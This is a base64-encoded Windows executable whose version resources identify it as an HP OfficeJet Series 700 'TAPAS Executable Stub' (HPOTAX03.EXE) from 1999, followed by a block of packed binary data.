AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAgFRAAOABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAOCAAAAAAAAAAAAAAKKBAAB8gQAA2IAAAAAAAAAAAAAAvoEAAHSBAABQgAAA AAAAAAAAAAAMhAAA7IAAAAAAAAAAlkAAAAAAAAAAAAAAAAAAyoIAAOSCAAD8gwAA6oMAAMqBAADe gQAA8IEAAAKCAAAQggAAHIIAACaCAAAyggAAQIIAAFSCAABoggAAhIIAAJqCAAC0ggAAaoMAAHiD AAD8ggAAFoMAACyDAAA+gwAAToMAAFyDAACegwAAhoMAAJKDAADOgwAAsIMAAMKDAADagwAAAAAA ALCBAAAAAAAAiIEAAJSBAAAAAAAAyoIAAOSCAAD8gwAA6oMAAMqBAADegQAA8IEAAAKCAAAQggAA HIIAACaCAAAyggAAQIIAAFSCAABoggAAhIIAAJqCAAC0ggAAaoMAAHiDAAD8ggAAFoMAACyDAAA+ gwAAToMAAFyDAACegwAAhoMAAJKDAADOgwAAsIMAAMKDAADagwAAAAAAALCBAAAAAAAAiIEAAJSB AAAAAAAAAQBUQVBBU0xpbmsAAgBUQVBBU0xpbmtFeABocG90YXAwMy5kbGwAAJQBTWVzc2FnZUJl ZXAAVVNFUjMyLmRsbAAA/gBHZXRNb2R1bGVIYW5kbGVBAAAoAUdldFN0YXJ0dXBJbmZvQQCqAEdl dENvbW1hbmRMaW5lQQBMAUdldFZlcnNpb24AAKMAR2V0Q1BJbmZvAJ0AR2V0QUNQAAAJAUdldE9F TUNQAABrAEV4aXRQcm9jZXNzAEYCVGVybWluYXRlUHJvY2VzcwAA0wBHZXRDdXJyZW50UHJvY2Vz cwBQAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAA/ABHZXRNb2R1bGVGaWxlTmFtZUEAAJYARnJl ZUVudmlyb25tZW50U3RyaW5nc0EAqwFNdWx0aUJ5dGVUb1dpZGVDaGFyAJcARnJlZUVudmlyb25t ZW50U3RyaW5nc1cA4QBHZXRFbnZpcm9ubWVudFN0cmluZ3MA4wBHZXRFbnZpcm9ubWVudFN0cmlu Z3NXAABuAldpZGVDaGFyVG9NdWx0aUJ5dGUAGwJTZXRIYW5kbGVDb3VudAAAKgFHZXRTdGRIYW5k bGUAAO8AR2V0RmlsZVR5cGUAbAFIZWFwRGVzdHJveQBqAUhlYXBDcmVhdGUAAF4CVmlydHVhbEZy ZWUA5QFSdGxVbndpbmQAewJXcml0ZUZpbGUAKwFHZXRTdHJpbmdUeXBlQQAALgFHZXRTdHJpbmdU eXBlVwAAbgFIZWFwRnJlZQAAaAFIZWFwQWxsb2MAWwJWaXJ0dWFsQWxsb2MAABYBR2V0UHJvY0Fk ZHJlc3MAAJABTG9hZExpYnJhcnlBAABLRVJORUwzMi5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAB+RDs4AAAAAAAAAgAGAAAAIAAAgBAAAAA4AACAAAAAAH5EOzgAAAAAAAAB AAEAAABQAACAAAAAAH5EOzgAAAAAAAABAAEAAABoAACAAAAAAH5EOzgAAAAAAAABAAkEAACAAAAA AAAAAH5EOzgAAAAAAAABAAkEAACQAAAAQJUAACwAAAAAAAAAAAAAAKCQAACgBAAAAAAAAAAAAACg uTQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA BgAGAAcAPwAAAAAAAAAEAAEAAQAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBOQEvAMAAAEAUwB0AHIA aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAmAMAAAEAMAA0ADAAOQAwADQARQA0AAAARAAWAAEAQwBv AG0AbQBlAG4AdABzAAAAVABBAFAAQQBTACAARQB4AGUAYwB1AHQAYQBiAGwAZQAgAFMAdAB1AGIA AABCAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAASABQAE8AVABBAFgAMAAz AC4ARQBYAEUAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAASABQAE8AVABBAFgA MAAzAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEgAZQB3AGwAZQB0AHQALQBQ AGEAYwBrAGEAcgBkACAAQwBvAC4AAAB8ACwAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgACgAYwApACAASABlAHcAbABlAHQAdAAtAFAAYQBjAGsAYQBy AGQAIABDAG8ALgAgADEAOQA5ADUALQAxADkAOQA4AAAAKAAAAAEATABlAGcAYQBsAFQAcgBhAGQA ZQBtAGEAcgBrAHMAAAAAAFQAFgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABU AEEAUABBAFMAIABFAHgAZQBjAHUAdABhAGIAbABlACAAUwB0AHUAYgAAADIACQABAEYAaQBsAGUA VgBlAHIAcwBpAG8AbgAAAAAAMAAxAC4AMAAwAC4AMAAwAAAAAABEABIAAQBWAGUAcgBzAGkAbwBu AEQAYQB0AGUAAAAAAE4AbwB2AGUAbQBiAGUAcgAgADIAMwAsACAAMQA5ADkAOQAAAFAAGAABAFAA cgBvAGQAdQBjAHQATgBhAG0AZQAAAAAASABQACAATwBmAGYAaQBjAGUASgBlAHQAIABTAGUAcgBp AGUAcwAgADcAMAAwAAAAOgALAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAQQAuADAA NgAuADAANwAuADAANgAAAAAAVAAYAAEAUAByAG8AZAB1AGMAdABGAGEAbQBpAGwAeQAAAAAASABQ ACAATwBmAGYAaQBjAGUASgBlAHQAIABTAGUAcgBpAGUAcwAgADcAMAAwAAAALAACAAEAUAByAG8A ZAB1AGMAdABGAGkAbABlAEYAbABhAGcAcwAAADEAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBm AG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAACQTkBAAABgBUAEEAUABBAFMA eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAPlzF+gOAAAAA8fpDgAAADEuLTseRAD4G8DDwdgdwdh36ARyAAA4nxHAmBr7n0Q3jI37 M4WVQ2se1PwPLmdwS6pPpMWpMCh8CJRNvfo0rGBKAUMQ0j0MbFsSHUxtsCAkc4LohBEMobaeSKgO FtKN0B0cpiSdYm2E/TCmFSIVYRGD2dpmUWgFBmKe+HLCGVIVZqSon6PhsdmVMcPauknmxSNJFZYs A/IqdMle/O75Zmmg8nnYdyfuE7jS+24VWfbLaAeDEAQINQ7kzoNFsDIvbhu5lTPr+8LngJJ/bj/0 rmoft4MioovLUovuxym0dmZ3D+AJ5zQ6nyIAXAo326EDMyh+hFu+/wiXbMCX8RgxgaqtfI5t+pGX f8SgXTc56Ajned8fwfsoZ6jxr2Rb6G94IIvG1YDE9YdXieSWy3nDn7stHiYvE0ksMU7YsBruIM/W AVS2VXNUx2/np9Qjk9Ihje4Fm5jbNaFQIp7xDikOiRDnCODBO/Gx2VEqxKRHqxols0gveVJQgN4T 4uH71vJWaaLbPElnJo2Db0S7GYc+upkLOsUlEAVDmdxDjDfCR+nLAdYE+4P7Z2Lrj7oQwDD+NTrW +qU8Rg9LkPvSPBwYgfKza81IuP6P9ke9GKIH30NIkZE/kAIAK4vAgJb7iKOgPQwrjbJwmlW7c29N m8+5mFtuT4Q+N0uTXAiUMzSL8GhipHvRgLLNsMaI1Nupveycuh19hsmWidLQq0awGUKkRQyVwyUs uJhthIWf/falkaxKYslN2FElIqS5nnQ+goVnfGNHahZ5AK7W01i3tSkQ84cxbVIcINRfJMODzVJs Q/v1rx2vtq0zBR7MspELkI4mHLtx5hR396V+Ks6KUrASYtFrofNLPm5KYqJ/uocZL/5RospN5bhs ehoBa0L4pKlaUjelR2Jfy5w2vqwTekWwQyFtsSv6/Baqc0TAG5RsEaH6f2qMgukC0/uaw9zXS31Y EN7f5K7RFv0JUa6bM3F1/A8NfvNAXJzDgzhx1LbRTCMs8Rb4g2o806eeSEqALbEBVNHCZMrp7JJ7 9ELo5Sw6Yf7fRFh/md1dRgacdMx1Oh2BT4IpGbggxVrE2zsCadZNxw6FAhxrOU8J5nLr7tl3nCkr szvyg2UFFVXXJhA25UV4FMQTxyNnTt7SHvlVsP3v3evQ8vISil3rXCuVfrLlYwqH99otKnrCYgCC E6v0RlbaTCu5ajoG+eYdoR5mgPND+HbIH/l+P6PjmT5qEcNUibInZcs7PZD5+2H1GMjO85lUucbh HcUF8SYdOKZyjjgwoU1tSkAWw8xAtrSUibS+nKhwFrP+xImtr/ZIH/ISGwgdkbETTNij6cT6ddyb dM8huilZ7cbYUDzFiN5jndnP8ZGn9WPZrFsa2T5OPZrpPHTSkdHZE46zXmDv4rcQPQOtt3tRrTbP JwUeeweLbSwZsbavBhbP8veaS3eMvFQ9Z6ENL4+jyrtpSmJVY06F8m2omuAi7iH2q2zSdDHROWSm AnlDu0Hmf70CG9m1w3JR4ry6qFFP+QVqg9IEwBYVRAneppmIGm1ItB6NIGBhu0r2mLvVTVQ9uoWu 74iUSqEembE+nMaOgOJtt9Al/ZYPxtnaToVsZ33aYXzi3Ej3NtAEfDAkVJSFTXT5rH2oYanJjCHs vGwqUJfdMSAinmNBu5trVOd/pJpT41m+Pz62AOjb8oh60t2QmNRbOXbhdIS0HdZte7lsXA9qBx6D 2vRu4e8sNct0gl9hZ5lu660+6pjiWq2Ho/KiK57PeUCGPx6ybL69TCcqNCVc4xmXK0Go9CYfhoBC 1Hf/Sgq9jEyDIgaxQ3p2a29oaXQvQNOAlcfNk3J2CW6PqyWRQwyH0yDJ2mXrXQnf1K1nxi2jepow HHNP12PoBs2AoM6iQzPUHe8LxkrW3ZANUCjJM1lZobQ10nnZRYbvEXxTi2yEEBRgMNQI4eSlLzE5 KVAy47TeY0LlPzEU5/PfHYPfsTG6L7Z1rRN5q6DR7eSXpjv/NuI8k70kRmko+vvnwyMFHg/HLmMs F1IrunFm2qASGz4qtmwKWXi2UpAOUlWNKUlio7yvniLLpiFoSVVbLy6EWL5qQlRNHI/xs1yGEMn9 jk48/YNSiw20mwX7Yk1biek3rBOV60jZFG58HxirNZFQO0qrTy5O9JhRBPrDq31FZf59rpkvjWNI 